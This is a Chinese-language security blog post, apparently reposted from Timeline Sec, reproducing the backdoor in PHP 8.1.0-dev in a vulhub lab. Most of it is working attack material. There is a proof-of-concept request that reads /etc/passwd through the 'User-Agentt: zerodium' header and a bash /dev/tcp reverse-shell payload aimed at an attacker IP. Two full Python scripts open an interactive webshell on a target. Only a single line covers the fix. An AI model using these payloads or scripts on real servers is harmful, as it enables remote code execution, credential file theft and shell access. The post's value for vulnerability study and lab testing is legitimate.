作者:Pet3r@Timeline Sec
本文字数:1465
阅读时长:3~4min
声明:请勿用作违法用途,否则后果自负
0x01 简介
PHP verion 8.1.0-dev于2021年3月28日与后门一起发布,但是后门很快被发现并删除。
0x02 漏洞概述
PHP verion 8.1.0-dev的PHP在服务器上运行,则攻击者可以通过发送User-Agentt标头执行任意代码。
0x03 影响版本
PHP 8.1.0-dev
0x04 环境搭建
使用vulhub进行搭建:
cd vulhub/php/8.1-backdoor
sudo docker-compose up -d
访问主页
http://192.168.40.140:8080/
0x05 漏洞复现
1、POC验证
GET / HTTP/1.1
Host: 192.168.40.140:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
User-Agentt: zerodiumvar_dump(2*3); //或者User-Agentt: zerodiumsystem("cat /etc/passwd");
Upgrade-Insecure-Requests: 1
#!/usr/bin/env python3
import os
import re
import requests
host = input("Enter the full host url:\n")
request = requests.Session()
response = request.get(host)
if str(response) == '<Response [200]>':
print("\nInteractive shell is opened on", host, "\nCan't access tty; job crontol turned off.")
try:
while 1:
cmd = input("$ ")
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0",
"User-Agentt": "zerodiumsystem('" + cmd + "');"
}
response = request.get(host, headers = headers, allow_redirects = False)
current_page = response.text
stdout = current_page.split('<!DOCTYPE html>',1)
text = print(stdout[0])
except KeyboardInterrupt:
print("Exiting...")
exit
else:
print("\r")
print(response)
print("Host is not available, aborting...")
exit
2、反弹shell或执行exp
GET / HTTP/1.1
Host: 192.168.40.140:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ADMINCONSOLESESSION=LBY9g1TYdvw2RyGQCX7JTQGt7Rn6TJnDmWhyJtKwMj2nL0M6GyyY!-1150793974; JSESSIONID=0B07F68800D0F5C0D8BD254A8748E2FF
User-Agentt: zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/192.168.40.129/6666 0>&1'");
Upgrade-Insecure-Requests: 1
EXP:
import argparse, textwrap
import requests
import sys
parser = argparse.ArgumentParser(description="PHP 8.1.0-dev WebShell RCE", formatter_class=argparse.RawTextHelpFormatter,
epilog=textwrap.dedent('''
Exploit Usage :
./exploit.py -l http://127.0.0.1
[^] WebShell= id
OR
[^] WebShell= whoami
'''))
parser.add_argument("-l","--url", help="PHP 8.1.0-dev Target URL(Example: http://127.0.0.1)")
args = parser.parse_args()
if len(sys.argv) <= 2:
print (f"Exploit Usage: ./exploit.py -h [help] -l [url]")
sys.exit()
# Variables
Host = args.url
r = requests.session()
## Use this for Proxy
#r.proxies.update( { 'http':'http://127.0.0.1:8080' } )
def svcheck():
verify = r.get(f'{Host}')
if (verify.headers['X-Powered-By'] == 'PHP/8.1.0-dev') :
print("Target is running on PHP 8.1.0-dev\n")
return True
def exec():
headerscontent = {
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0',
'User-Agentt' : f'zerodiumsystem("{Command}");'
}
door = r.get(f'{Host}', headers = headerscontent, allow_redirects= False)
resp = door.text.split("<!DOCTYPE html>")[0]
if (resp == ""):
print()
print("Invalid Command")
print()
else:
print()
print(resp)
if __name__ == "__main__":
print ('\n[+] PHP 8.1.0-dev WebShell RCE \n ')
try:
if svcheck() == True:
print("*Type the command* \n")
try:
while True:
Command = input("[^] WebShell= ")
exec()
except:
print("\r\nExiting.")
sys.exit(-1)
except Exception as ex:
print('Invalid URL or Target not Vulnerable')
0x06 修复方式
建议参考官方公告及时升级或安装相应补丁。
参考链接:
https://news-web.php.net/php.internals/113838
https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor
https://www.php.net/
本文分享自 Timeline Sec 微信公众号,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文参与 腾讯云自媒体同步曝光计划 ,欢迎热爱写作的你一起参与!